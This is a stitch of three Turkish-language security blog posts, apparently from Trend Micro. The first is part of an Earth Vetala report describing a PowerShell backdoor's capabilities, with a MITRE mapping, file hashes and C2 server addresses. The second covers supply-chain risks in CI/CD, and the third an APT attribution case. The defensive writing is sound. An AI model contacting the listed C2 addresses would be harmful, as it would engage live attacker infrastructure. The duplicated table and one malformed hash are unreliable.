Şekil 10. gizliliği kaldırılmış PowerShell arka kapısı

Yukarıdaki ekran görüntüsü, bellek içerisindeki PowerShell arka kapısının kısaltılmış bir görüntüsünü göstermektedir. PowerShell arka kapısı aşağıdaki yeteneklere sahiptir.

  • Skype bağlantısını kontrol etme
  • Skype’ı indirme ve yükleme
  • C2 bağdaştırıcısı ile kodlanmış iletişim
  • C2 sunucusundan gönderilen komutları yürütme
  • Çok faktörlü kimlik doğrulama ayarlarını alma
  • Mevcut oturum açmış kullanıcı ve işletim sistemi sürümü bilgilerini alma

Earth Vetala Saldırısının Ayak İzi

Earth Vetala saldırısı, birden çok ülkeyi hedef alan kapsamlı bir girişim gerçekleştirmiştir. Bu saldırının aşağıdaki ülkelerde gerçekleştirildiğini gözlemledik:

  • Azerbaycan
  • Bahreyn
  • İsrail
  • Suudi Arabistan
  • Birleşik Arap Emirlikleri
pastedGraphic_7.png

Şekil 11. Etkilenen ülkeler

Earth Vetala saldırısının aşağıdaki sektörleri hedeflediğini gözlemledik:

  • Devlet Kurumları
  • Akademi
  • Turizm

Trend Micro Çözümleri

Earth Vetala saldırısı ilginç bir tehdit niteliğindedir. Bu saldırı uzaktan erişim yeteneklerine sahip olsa da saldırganların bu araçların tamamını kullanabilecek uzmanlıkta olmadığı görülmektedir. Saldırının MuddyWater tehdit aktörleriyle bağlantılı olduğunu düşünüyoruz. Saldırganların diğer bağlantılı girişimlerde gösterdiği yüksek teknik beceriler göz önünde bulundurulduğunda, bu oldukça beklenmedik bir durum.

Bu alanda elde ettiğimiz bulgulara Özel İstihbarat Araştırma (DIR) analistlerimiz sayesinde ulaştık. Analistlerimiz, kuruluşların önemli kararlar almasına ve karşılaştıkları güvenlik sorunlarının temeli anlamasına yardımcı olmak için her zaman yardıma hazırdır. Özel İstihbarat Araştırma hizmetimiz hakkında daha fazla bilgi edinmek için lütfen bölgenizdeki Satış ekibimiz ile iletişime geçin.

MITRE ATT&CK Teknik Eşlemesi

TaktikTeknik
Kaynak GeliştirmeAltyapı Edinme: Web Hizmetleri – T1583.006
İlk ErişimKimlik Avı: Hedefli Kimlik Avı Eki – T1566.001 Kimlik Avı: Hedefli Kimlik Avı Bağlantısı – T1566.002
YürütmeKomut ve Komut Dosyası Yorumlayıcı: PowerShell – T1059.001 Komut ve Komut Dosyası Yorumlayıcı: Windows Command Shell – T1059.003 Komut ve Komut Dosyası Yorumlayıcı: Visual Basic – T1059.005 Kullanıcı Yürütmesi: Kötü Amaçlı Bağlantı – T1204.001 Kullanıcı Yürütmesi: Kötü Amaçlı Dosya – T1204.002
Kalıcı, Ayrıcalık YükseltmeÖnyüklemeyi veya Oturum Açmayı Otomatik Başlatma İşlemini Yürütme: Kayıt Defteri Çalıştırma Anahtarları / Başlangıç Klasörü – T1547.001
KeşifHesap Keşfi: Etki Alanı Hesabı – T1087.002
Kimlik Bilgilerine ErişimParola Depolarından Gelen Kimlik Bilgileri: Web Tarayıcılarından Gelen Kimlik Bilgileri – T1555.003
Komut ve DenetimVeri Kodlama: Standart Kodlama – T1132.001
Savunma Sistemlerini AtlatmaDosyaların veya Bilgilerin Gizliliğini Kaldırma/Kodunu Çözme – T1140

Gizliliğin Tehlikeye Girmesine İlişkin Göstergeler

Dosyalar

Dosya adıSHA-256Trend Micro Algılama AdıAçıklama
SharpChisel.exe61f83466b512eb12fc82441259a5205f076254546,a7726a2e3e983011898e4e2HackTool.MSIL.Chisel.ASharpChisel tünel oluşturma aracı
PD64.dllccdddd1ebf3c5de2e68b4dcb8fbc7d4ed32e8f39f6fdf71ac022a7b4d0aa4131Trojan.Win64.PASSDUMP.AHackTool.Win64.PassDump.AC tarafından kullanılan dosya
PasswordDumper.exe0cd6f593cc58ba3ac40f9803d97a6162a308ec3caa53e1ea1ce7f977f2e667d3HackTool.Win64.PassDump.ACParola dökümü aracı
out1.exe79fd822627b72bd2fbe9eae43cf98c99c2ecaa5649b7a3a4cfdc3ef8f977f2e6HackTool.Win64.Lazagne.AGPyinstaller uzak erişim aracı
newsblog.js304ea86131c4d105d35ebbf2784d44ea24f0328fb483db29b7ad5ffe514454f8Trojan.JS.DLOADR.AUSUOLVBS indirme programı
new.exefb414beebfb9ecbc6cb9b35c1d2adc48102529d358c7a8997e903923f7eda1a2HackTool.Win64.LIGOLO.ALIGOLO tünel oluşturma aracı
Browser64.exe3495b0a6508f1af0f95906efeba36148296dccd2ab8ffb4e569254b683584feaHackTool.Win64.BrowserDumper.ATarayıcı veritabanlarına erişim aracı
1.exe78b1ab1b8196dc236fa6ad4014dd6add142b3cab583e116da7e8886bc47a7347HackTool.Win64.LIGOLO.ALIGOLO tünel oluşturma aracı
مکتبة إلکترونیة.pdf70cab18770795ea23e15851fa49be03314dc081fc44cdf76e8f0c9b889515c1bTrojan.PDF.RemoteUtilities.AGömülü URL’ler içeren PDF dosyası

468e331fd3f9c41399e3e90f6fe033379ab69ced5e11b35665790d4a4b7cf254Trojan.W97M.RemoteUtilities.AGömülü URL’ler içeren RTF dosyası
مکتبة إلکترونیة .zipf865531608a4150ea5d77ef3dd148209881fc8d831b2cfb8ca95ceb5868e1393PUA.Win32.RemoteUtilities.ARemoteUtilities içeren arşiv
مکتبة إلکترونیة.exef664670044dbd967ff9a5d8d8f345be294053e0bae80886cc275f105d8e7a376PUA.Win32.RemoteUtilities.ARemoteUtilities uzak erişim yazılımı
برنامج.zip8bee2012e1f79d882ae635a82b65f88eaf053498a6b268c594b0d7d601b1212fPUA.Win32.RemoteUtilities.ARemoteUtilities içeren arşiv
برنامجدولیة.zip9b345d2d9f52cda989a0780acadf45350b423957fb7b7668b9193afca3e0cd27PUA.Win32.RemoteUtilities.ARemoteUtilities içeren arşiv
ورش مجانية.zip5e2642f33115c3505bb1d83b137e7f2b18e141930975636e6230cdd4292990ddPUA.Win32.RemoteUtilities.ARemoteUtilities içeren arşiv
مکتالمنحالدراسیة.zipb2f429efdb1801892ec8a2bcdd00a44d6ee31df04721482a1927fc6df554cdcfPUA.Win32.ScreenConnect.PScreenConnect içeren arşiv
المنح الدرایةس.exe3e4e179a7a6718eedf36608bd7130b62a5a464ac301a211c3c8e37c7e4b0b32bPUA.Win32.ScreenConnect.PScreenConnect uzak erişim yazılımı
Dosya adıSHA-256Trend Micro Algılama AdıAçıklama
SharpChisel.exe61f83466b512eb12fc82441259a5205f076254546a7726a2e3e983011898e4e2HackTool.MSIL.Chisel.ASharpChisel tünel oluşturma aracı
PD64.dllccdddd1ebf3c5de2e68b4dcb8fbc7d4ed32e8f39f6fdf71ac022a7b4d0aa4131Trojan.Win64.PASSDUMP.AHackTool.Win64.PassDump.AC tarafından kullanılan dosya
PasswordDumper.exe0cd6f593cc58ba3ac40f9803d97a6162a308ec3caa53e1ea1ce7f977f2e667d3HackTool.Win64.PassDump.ACParola dökümü aracı
out1.exe79fd822627b72bd2fbe9eae43cf98c99c2ecaa5649b7a3a4cfdc3ef8f977f2e6HackTool.Win64.Lazagne.AGPyinstaller uzak erişim aracı
newsblog.js304ea86131c4d105d35ebbf2784d44ea24f0328fb483db29b7ad5ffe514454f8Trojan.JS.DLOADR.AUSUOLVBS indirme programı
new.exefb414beebfb9ecbc6cb9b35c1d2adc48102529d358c7a8997e903923f7eda1a2HackTool.Win64.LIGOLO.ALIGOLO tünel oluşturma aracı
Browser64.exe3495b0a6508f1af0f95906efeba36148296dccd2ab8ffb4e569254b683584feaHackTool.Win64.BrowserDumper.ATarayıcı veritabanlarına erişim aracı
1.exe78b1ab1b8196dc236fa6ad4014dd6add142b3cab583e116da7e8886bc47a7347HackTool.Win64.LIGOLO.ALIGOLO tünel oluşturma aracı
مکتبة إلکترونیة.pdf70cab18770795ea23e15851fa49be03314dc081fc44cdf76e8f0c9b889515c1bTrojan.PDF.RemoteUtilities.AGömülü URL’ler içeren PDF dosyası

468e331fd3f9c41399e3e90f6fe033379ab69ced5e11b35665790d4a4b7cf254Trojan.W97M.RemoteUtilities.AGömülü URL’ler içeren RTF dosyası
مکتبة إلکترونیة .zipf865531608a4150ea5d77ef3dd148209881fc8d831b2cfb8ca95ceb5868e1393PUA.Win32.RemoteUtilities.ARemoteUtilities içeren arşiv
مکتبة إلکترونیة.exef664670044dbd967ff9a5d8d8f345be294053e0bae80886cc275f105d8e7a376PUA.Win32.RemoteUtilities.ARemoteUtilities uzak erişim yazılımı
برنامج.zip8bee2012e1f79d882ae635a82b65f88eaf053498a6b268c594b0d7d601b1212fPUA.Win32.RemoteUtilities.ARemoteUtilities içeren arşiv
برنامجدولیة.zip9b345d2d9f52cda989a0780acadf45350b423957fb7b7668b9193afca3e0cd27PUA.Win32.RemoteUtilities.ARemoteUtilities içeren arşiv
ورش مجانية.zip5e2642f33115c3505bb1d83b137e7f2b18e141930975636e6230cdd4292990ddPUA.Win32.RemoteUtilities.ARemoteUtilities içeren arşiv
مکتالمنحالدراسیة.zipb2f429efdb1801892ec8a2bcdd00a44d6ee31df04721482a1927fc6df554cdcfPUA.Win32.ScreenConnect.PScreenConnect içeren arşiv
المنح الدرایةس.exe3e4e179a7a6718eedf36608bd7130b62a5a464ac301a211c3c8e37c7e4b0b32bPUA.Win32.ScreenConnect.PScreenConnect uzak erişim yazılımı

  • 23.94.50.197:444
  • 23.95.215.100:443
  • 23.95.215.100:8080
  • 87.236.212.184:443
  • 87.236.212.184:8008

Yazan: Adi Peretz, Erick Thek

5 Mart 2021

Tedarik Zincirinin Zayıf Yanlarını Belirleme

Tedarik zincirindeki zayıf noktalara sürekli olarak kötü amaçlı saldırılar gerçekleştirilmektedir. Tüm saldırılar gibi, bu saldırılar da daha gelişmiş şekillere bürünebilir. Risklerle karşılaşılabilecek birden çok aşaması bulunan yazılım geliştirme çalışmaları ise nispeten daha savunmasızdır.

Meşhur Orion Solar Winds vakası, hem siber güvenlik topluluğunda hem de kamuda büyük yankı uyandırırken tüm dünyanın dikkatini tedarik zinciri saldırılarına çekti. Söz konusu saldırılar yeni değil, hatta bu tür tehditler epeydir oldukça yaygın. Bu saldırılar da tüm saldırılarda olduğu gibi gelişmiş formlar alıyor. Bu makalede bu tür saldırıların örneklerini inceleyecek ve olası yeni senaryolara bakacağız.

Zayıf Halkalar Nerede?

Öncelikle tedarik zincirine somut bir tanım getirelim. Genel tanım, “bir ürünü müşteriye sunma süreci” şeklinde. Bilgisayar dünyasında ise bu tanımdaki ürünün karşılığı, geliştirilen yazılım oluyor. Bu nedenle, öncelikle yazılım geliştirme sürecinin kendisini mercek altına alalım.

Yazılım geliştiriciler, hangi yöntemi kullanırlarsa kullansınlar karmaşık projeleri daha basit görevlere bölmek zorundadırlar. Böylece görevler tanımlandıktan sonra istenilen sorun izleme yazılımında belirli geliştiricilere atanabilir. Ardından yazılım geliştirici bir kod yazar ve bu kodu test edip değişiklikleri kaynak kod yönetimi (SCM) yazılımına aktarır.

Kod, sürekli entegrasyon ve sürekli teslimat (CI/CD) hattında işlenir. Bu hat; derlemeler, testler ya da proje tercihinin son devreye alımını gerçekleştirmek üzere belirli görevleri yürütür. 

Tanımlanan tedarik zinciri sürecimizin her adımında kendine özgü güvenlik riskleri ve etkileri bulunur. Örneğin, bazı güvenlik ihlalleri sorun izleme yazılımını kullanan kötü amaçlı kullanıcılardan kaynaklanabilir. Bu kullanıcılar, güvenlik bilgilerinden fayda sağlayan şirket içerisindeki öfkeli kişiler veya güvenlik açıklarından istifade eden herhangi biri olabilir. Bu senaryolar gerçekleşebilir, ancak zincirde başka birçok adım olduğu için etkisi muhtemelen küçük olacaktır. Tedarik zincirinin diğer bölümlerinin kötü amaçlı görevlerden etkilenme olasılığı oldukça yüksektir. Bu nedenle, bu senaryo üzerinde çok fazla durmayacağız. Ancak kimlik doğrulaması için bir istisna yapalım. 

Bütün tedarik zincirinin gücü ve dayanıklılığı en zayıf halkalarına bağlı olduğundan, güvenlikle ilgili en iyi uygulamaların göz ardı edilmesi (parolaların tekrar kullanılması veya düzgün kimlik doğrulama mekanizmalarının eksikliği gibi) kötü amaçlı oyuncuların sistemlere erişebileceği ve saldırının etkisinin daha büyük olabileceği anlamına gelir.

Yazılım Geliştiriciler ve SCM

Zincirin diğer bir ayrılmaz parçası, kod yazması için kendisine ihtiyaç duyulan geliştiricidir. Zayıflık ve olası bir güvenlik riski olarak insan faktörünü göz önünde bulundurmak gerekir. Geliştiricinin yerine makineleri koyalım, demiyoruz, ancak geliştiricileri karşılaşabilecekleri riskler konusunda eğitmeliyiz.

Son zamanlarda, tehdit oyuncularının güvenlik açıklarını araştıran kişileri hedef aldıklarını gözlemliyoruz. Teknik bakış açışıyla, bu tehdidin bir Visual Studio proje dosyasında ve spesifik olarak ön derleme olayında gizlenmiş olup PowerShell destekli bir yükte ortaya çıkması ilginçtir. Bu senaryodan öğrenilecek dikkate değer iki bağlantı vardır. Birincisi “meslektaşlar” arasındaki güven düzeyi, ikincisi ise daha kaynak kodunun daha fazla benimsenmesi ve üçüncü taraf proje entegrasyonlarıdır. Hangi kaynak kodunun ve hangi projelerin entegre edileceğine dikkat edilmelidir. Bunun için kullanılan kodun, yazılımın, eklentilerin veya konteynerlerin kaynağının doğrulanması gerekir. Daha önceki çevrimiçi kod yazma platformlarına ilişkin makalelerimizden birinde sorunları ele almıştık.

Geliştiricinin zincirin sonraki bölümü olan SCM’ye de erişimi vardır. Bunun için giriş bilgileri gereklidir ve her erişimde bu bilgilerin tekrar tekrar girilmesi can sıkıcı olduğundan bu bilgiler depolanırlar. Bilgilerin depolanması, sızma riskini de beraberinde getirir ve şifrelenmemiş şekilde depolandıklarında saldırının etkisi daha büyük olur. 

DevOps topluluğunda yaygın bir davranış biçimi görüyoruz: Geliştiriciler, hizmet simgeleri, kullanıcı adları ve e-posta adresleri gibi bilgileri şifrelenmemiş şekilde depoluyor (örneğin, metin tabanlı yapılandırma dosyaları veya çevresel değişkenler).

Şekil 2. Giriş bilgilerinin ve simgelerin “güvenli” ortamlarda düzyazı (plaintext) içinde depolanmasına bir örnek

Bu güvenlik meselelerini konuşmak lüzumsuz gibi görünse de bir zincirin en zayıf halkası kadar güçlü olduğu klişesinde doğruluk payı vardır. Bu nedenle de riskleri azaltan önlemler (örneğin parola kasaları kullanmak), üzerinde düşünülmeye değer konulardır.

Şekil 3. Kaynak kodda sabit kodlu düzyazı giriş bilgilerinin kullanılmasına bir örnek

Özünde, geliştiriciler sabit kodlu giriş bilgilerini SCM’yeaktarmamalıdır. Örneğin, kod olarak altyapı (IaC)kullanırken, giriş bilgilerini depolamayı genel olarak göz önünde bulundurmalıdırlar.

CI/CD Hattı

Zincirin sonraki parçası CI/CD hattıdır. Jenkins, GitLab, TeamCity, Azure DevOps gibi tanıdık isimlerin yer aldığı yazılım tedarikçileri arasında yoğun bir rekabet vardır. 

CI/CD yazılımının içindeki hat aşağıdakilere bölünebilir:

Şekil 4. CI/CD Hattı

Sistem Erişimi

Güvenlik açısından bakıldığında, bu tür sistemlere erişimin sınırlanması ve herkese erişim izni verilmemesi gerekir. Bu sistemler kurumsal ağda gizlenmeli, yalnızca belirli rollerdeki ve belirli erişim haklarına sahip kullanıcılar tarafından erişilebilir olmalıdır. Güvenlik açıkları söz konusu olabileceği için basit bir şekilde internete erişmek bile bir güvenlik riskidir ve bu durum, daha önce de şahit olduğumuz gibi tehdit oyuncuları tarafından aktif olarak istismar edilebilir. 

Sistem Yapılandırılması

Yanlış yapılandırma da güvenlik riskine ve ilgili sorunlara neden olabilir. Belirli ortamlar için belirli yapılandırmalar gerekir. Örneğin, bir kuruluşta birden çok kullanıcının sisteme erişmesi gerekir, ancak herkesin rolü farklıdır. Bu durumda role dayalı güvenlik yapılandırması gereklidir. Bununla birlikte, daha önce Jenkins vakasında da açıkladığımız gibi, bu yapılandırmalarda bazı tuzaklar bulunur. Yazılımın ve yapılandırma seçeneklerinin giderek karmaşık bir hal almasıyla birlikte, yazılımın yanlış yapılandırmalara karşı test edilmesi ısrarla tavsiye edilir.

Kaynak Kodun Alınması

Burada iki modelden söz edebiliriz:

Azure DevOps sunucusunda olduğu gibi SCM CI/CD hattına entegre edilir

SCM farklı ortamlarda çalışır; bu nedenle erişim belirteçlerinin veya giriş bilgilerinin sistemin içinde depolanması gerekir

Kaynak kodu bilgilerinin açığa çıkması kötü amaçlı kaynak kodu modifikasyonlarına neden olabileceği için yazılımın kaynak kodu giriş bilgilerini nasıl depoladığı çok önemlidir. Bununla birlikte, CI/CD yazılımında güvenli olmayan uygulamalardan faydalanıldığını da gördüğümüzü ve üçüncü taraf uzantılarında şifrelenmemiş giriş bilgisi depolama zafiyetlerini keşfettiğimizi (Jenkins eklentileri vakasında olduğu gibi) söylememiz gerekir.

Derleme Ortamının Yapılandırılması

Buradaki güvenlik konuları elbette giriş bilgilerinin aktarılmasıyla ilgilidir. Şifrelenmemiş giriş bilgilerinin ve depolarının derleme varlıklar halinde aktarılması riski vardır. Esas olarak, bazı yapılandırma ön koşulları, bir derlemeden sonra genellikle geride bırakılacak olan hassas bilgileri içerir.

Derleme 

Bu adımda asıl kaynak kod hedeflenen ikili formda derlenir. Solar Winds ve CCleaner vakalarında bu aşamada saldırılar olduğunu gördük. Saldırganın bu aşamada saldırı düzenlemesinin mantıklı nedenleri vardır. Birincisi, bu aşama tedarik zincirindeki son adımlardan biri olduğu için sonrasında çok fazla doğrulama olmayacaktır. İkincisi, üretilen yürütülebilir ikililer günümüzde genellikle dijital olarak imzalanır. Bu da kodun imzalanmasından sonraki kod modifikasyonlarının tamamı için geçerli bir dijital imza mümkün olmayacağı anlamına gelir. İkilinin sağlaması eşleşecektir ve özel bir anahtarla şifrelendiği için bu bilgi olmadan geçerli bir sağlama üretilmesi mümkün olmayacaktır. Bu nedenle derleme süreci, tedarik zinciri saldırıları için uygun bir hedeftir. Bununla birlikte, yazılımların hepsi dijital bir imza ile gönderilmez. 

Dijital imzadan söz ederken, sertifikanın özel anahtarını gizli tutma ihtiyacını vurgulamamız gerekir. Bu özel anahtarın ele geçirilmesi, saldırganların istedikleri yazılımı söz konusu sertifikayla dijital olarak imzalayabilecekleri anlamına gelir ve bu nedenle bu anahtar iptal edilmelidir.

Devreye Alma veya Ürün Teslimatı

Zincirin CI/CD hattına ekleyebileceğimiz son parçası devreye almadır. Öncelikle, devreye alma süreci CI/CD yazılımında belirlenebilir ve başarılı bir derleme veya test üzerine tetiklenebilir. Bu yüzden, mimari bilgilere giriş bilgileri ve diğer hassas bilgilerle birlikte buradan ulaşılabilir. Bu nedenle, düzgün şekilde yönetilmeleri gereklidir.

Bir saldırgan için en kolay yol yazılım ürününü tamamıyla değiştirmektir. Ayrıca, kötü amaçlı kodlar enjekte edilebilir ve bu, belirli uygulamalar için uygundur (dijital olarak imzalanmaz). Örneğin, WordPress tabanlı web sitelerindekötü amaçlı kod parçalarının bir güvenlik açığından veya güvenlik zayıflığından faydalanılarak eklendiği kod enjeksiyonu saldırılarıyla karşılaşabiliriz. 

Yürütülebilir bir ikili kod enjeksiyonu da mümkündür, ancak bu tür bir saldırı derlenen ikiliye ve saldırganın becerilerine bağlıdır. Ayrıca ikili dijital olarak imzalanırsa saldırı kolaylıkla keşfedilebilir ve etkili değildir. Basitçe ikililerin değiştirilmesi saldırganlar için daha kolaydır. Bununla birlikte, ikilinin depolandığı teslimat sunucusunun (kullanıcıların asıl yazılım ürünlerini indirmelerine olanak tanıyan sunucular) hack’lenmesi kolay bir iş değildir ve önemli kaynaklar gerektirir. Bunun yerine; kimlik avı, dolandırıcılık kampanyaları veya DNS sahtekarlığı saldırıları gibi taktikler kullanılmakta ve bilinen yazılım markalarının (hatta güvenlik tedarikçilerinin) kötü amaçlı veya aldatıcı yazılım yüklerinden istifade edilmektedir.

Sonuç

Bu blog yazısı, tedarik zinciri güvenliğine ilişkin temel konuları ana hatlarıyla açıklar. Bu tür saldırıların neden olduğu sorunlar bir yazıda anlatılamayacak kadar karmaşıktır. Yıllık tahminlerimizde daha önce bahsettiğimiz gibi kuruluşların 2021 yılının sonuna kadar iş yüklerinin çoğunu bulutta çalıştırmaya başlamış olacakları tahmin ediliyor. Bu nedenle bu konunun bir an önce ele alınması gerekiyor. Karşılaşılan sağlık krizi sonucunda birçok kuruluş güvenlik endişelerinin kapsamını tam olarak anlamadan yeni yazılımları aceleyle benimsiyor.

Belirlenen tedarik zinciri saldırılarıyla ilgili daha fazla bilgi edinmek için bu GitHub sayfasını ziyaret edin. 

Sanallaştırma ve BulutBulut BilişimGüvenlik Açıkları konularında yayınlanmıştır

ATPX’İ BULMA: MITRE TTP’LERİ ARACILIĞI İLE SALDIRILARI İLİŞKİLENDİRME

Güvenlik ekipleri ve araştırmacılar, siber güvenlik alanındaki en güncel bulguları öğrenmek için kamuya açık olarak sunulan araç, rutin ve davranış analizlerine bel bağlıyor. Yayınlanan bilgiler, gelişmiş sürekli tehditlere (APT’ler) karşı savunma araçlarının kurulumu ve ilgili sektörlerde meydana gelmesi olası saldırıların önlenmesi için bilinen taktik, teknik ve prosedürlere (TTP’ler) referans oluyor.

Bununla birlikte, bir saldırıya karşı savunma yollarını teorik olarak bilmekle bunları ilk elden deneyimlemek arasında çok büyük fark var. Yayınlanan rutinler, araçlar ve davranışlar, hedef alınan her şirket veya sektör için suç gruplarının uygulamalarından farklı olabilir. Dahası, bu fark büyük ölçüde güvenliği ihlal edilen şirketlerin araştırılan ortamına dayanır. Araştırmaya ve giriş yollarına ayrılan çabanın ve kaynakların miktarı göz önünde bulundurulduğunda, bu tehdit oyuncularının her defasında farklı bir yöntem bulacağı, gözlem yaparken gizli kalacakları, komutları gizlice gönderip bilgi alacakları, trafiklerini maskeleyecekleri ve mümkün olduğunca uzun bir süre daha çok sayıda cihaza bulaşacakları kesindir. İşte bu noktada araştırmacılar, analistler ve teknolojik çözümler devreye giriyor.

Sunucularından birinde şüpheli bir komuta kontrol (C&C) trafiği tespit eden bir güvenlik ekibi, şirketin sistemlerindeki bu trafiği incelememiz ve analiz etmemiz için bizi aradı. Disk ve bellek görüntüleri dahil olmak üzere geri bildirim ve etkinlik günlüklerini incelememiz için sınırlı sayıda makineye ve veriye erişimimiz sağlandı. Ancak, bir uç nokta tespit ve yanıt (EDR) çözümü veya bir katmanlar arası tespit ve yanıt (XDR) çözümü olmadan, muhtemelen erişilemeyen sistemin ortamında çalışan ve keşfedilmemiş tüm örnekleri ve araçları toplamanın yolu yoktu. Bu durum, incelemeyi yapan güvenlik ekiplerinin tam bir harita çıkarıp saldırının niteliklerini görmesini engelledi.

Kapsam ve Ön Analiz

Günlüklerin ilk analizine göre, toplam 62 makineye virüs bulaştı. Bunlardan 10’u sunucu, 13’ü dosya kazıma ve veri sızdırma becerisi olan ikililere sahip makineler, 22’si arka kapı muhafazası olan makinelerken, geri kalanı ise saldırıda istismar edilen kötü niyetli ikililerin yüklenmesini sağlayan diğer araçları ve normal uygulamaları barındırıyordu.

Arka kapı saldırganın cmd.exe kullanarak komutları çalıştırmasına izin verir. Kullanıcı hesaplarını ele geçirmek için Mimikatz gibi uygulamalar kullanıldı. Virüs bulaştırılacak diğer makinelerin bulunması için kullanılan ağ tarama araçları, arka kapının diğer araçları uzaktan bırakmasına olanak tanıyan kötü niyetli bir ağa dahil edildi. Uzaktan bırakılan yürütülebilir dosyanın çalıştırılması için zamanlanmış bir görev oluşturuldu ya da bir wmic süreç oluştur komutu kullanıldı. Birçok durumda arka kapı kopyaları bırakılırken, bırakılan ve yürütülen araçlar da çeşitliydi.

Saldırganlar çoğunlukla PDF ve Microsoft Office dosyaları gibi belge dosyalarının peşindeydi. Ayrıca, ikililerin zaman damgalarına ve virüsün bulaşma yaygınlığına bakıldığında, bu saldırıların birkaç yıldır devam ettiği söylenebilir. MITRE ATT&CK ile bulduğumuz rutinleri ve araçları karşılaştırdığımızda, gözlemlenen tekniklerin hem APT32 hem de APT3 ile eşleştiğini, ancak birkaç tekniğin farklı olduğunu ve ilişkilendirilemediğini gördük.

Analiz ve Nitelendirme

Tekniklerin çeşitliliğini nedeniyle, en çok sayıda kuruluma sahip olan beş uç nokta hedefinden faydalanarak rutinlerin kullandığı ve bağlandığı araçları ve ilişki kümelerini analiz ettik. Altı tür veri sızdırma aracı, altı arka kapı ve çeşitli amaçlarla kullanılan beş farklı araç tespit ettik. Bu araçların çoğu, MySQL arka uç veritabanına sahip belge yönetimi sistemi gibi şirketin barındırdığı çeşitli sistemlerden ve yazılımlardan istifade etti. Ayrıca, araçları kötü amaçlı rutinlere bağlayan altı ilişki kümesi ve APT gruplarının ve alt gruplarının önceden belgelenen girişimleriyle eşleştirilebilecek olan dört izinsiz giriş seti bulduk. Bu araçları ve ilişkileri “Finding APTX: Attributing Attacks viaMITRE TTPs” başlıklı makalemizde ayrıntılarıyla anlatıyoruz.

Saldırıyı yaptığını düşündüğümüz gruplar, çeşitli araçlar kullanıyor ve daha önce diğer araştırmacıların yayınladığı diğer gruplarla güçlü bağlantıları bulunuyor. Araçların paketlenme biçimi veya “açıklayıcılığı” arasındaki tezatlara bakıldığında yazı stillerinin de çok değişiklik gösterdiği görülüyor. Ayrıca, her bir izinsiz giriş setindeki veri sızdırma süreçlerinde görülen yedekler, hedefin sürekli bilgi çalma, veri güncellemeleri ve sistemde gizli kalarak uzun süre mevcudiyet olduğu düşünüldüğünde hiç de şaşırtıcı değil.

Her ne kadar bir talihsizlik olsa da mağdur kuruluşlar, referans olarak kullanabilecekleri ihlal göstergelerini (IOC’ler) belirleme konusunda benzersiz bir konuma sahipler. Günümüzde mevcut teknoloji çözümleri (EDR ve XDR gibi) göz önünde bulundurulduğunda, tanımlanmayan günlükler, izinsiz girişin eksiksiz bir haritasının oluşturulması için gereken eksik bağlantıları kanıtlayabilir ve tespit edebilir.

Bu çözümler, saldırının nasıl meydana geldiğini tanımlamak ve bu etkinlikleri yeniden oluşturmak için ihtiyaç duyulan zamanı kısaltabilir. Yine de güvenlik ve inceleme ekiplerinin işbirliği, özellikle saldırıdan sorumlu grupların bulunması bakımından tehditlerin tanımlanmasında, önlenmesinde ve azaltılmasında önemli bir rol oynar. Süreç çok açık olmasa da kullanılan tekniklerin ve araçların belirlenmesi, etkinlikler ve araçlar arasındaki ilişki belirlendiğinde güvenlik ekiplerinin tüm şirket yapısını savunmalarını sağlayabilir.

İncelememizin tüm teknik ayrıntılarını ve analizlerini okumak için “Finding APTX: Attributing Attacks via Mitre TTPs” başlıklı makalemizi indirin.

Yönetimli Tespit ve MüdahaleAraştırmaGelişmiş ve Israrlı TehditlerSiber SuçSiber GüvenlikKurumsalOlay yanıtıMDRMITRE ATT&CKyazılarında yayınlanmıştır.

Yazanlar: Lenart Bermejo (Tehdit Mühendisi), Gilbert Sison(Siber Tehdit Avlama Teknik Yöneticisi) ve Buddy Tancio(Olay Yanıtı Analisti)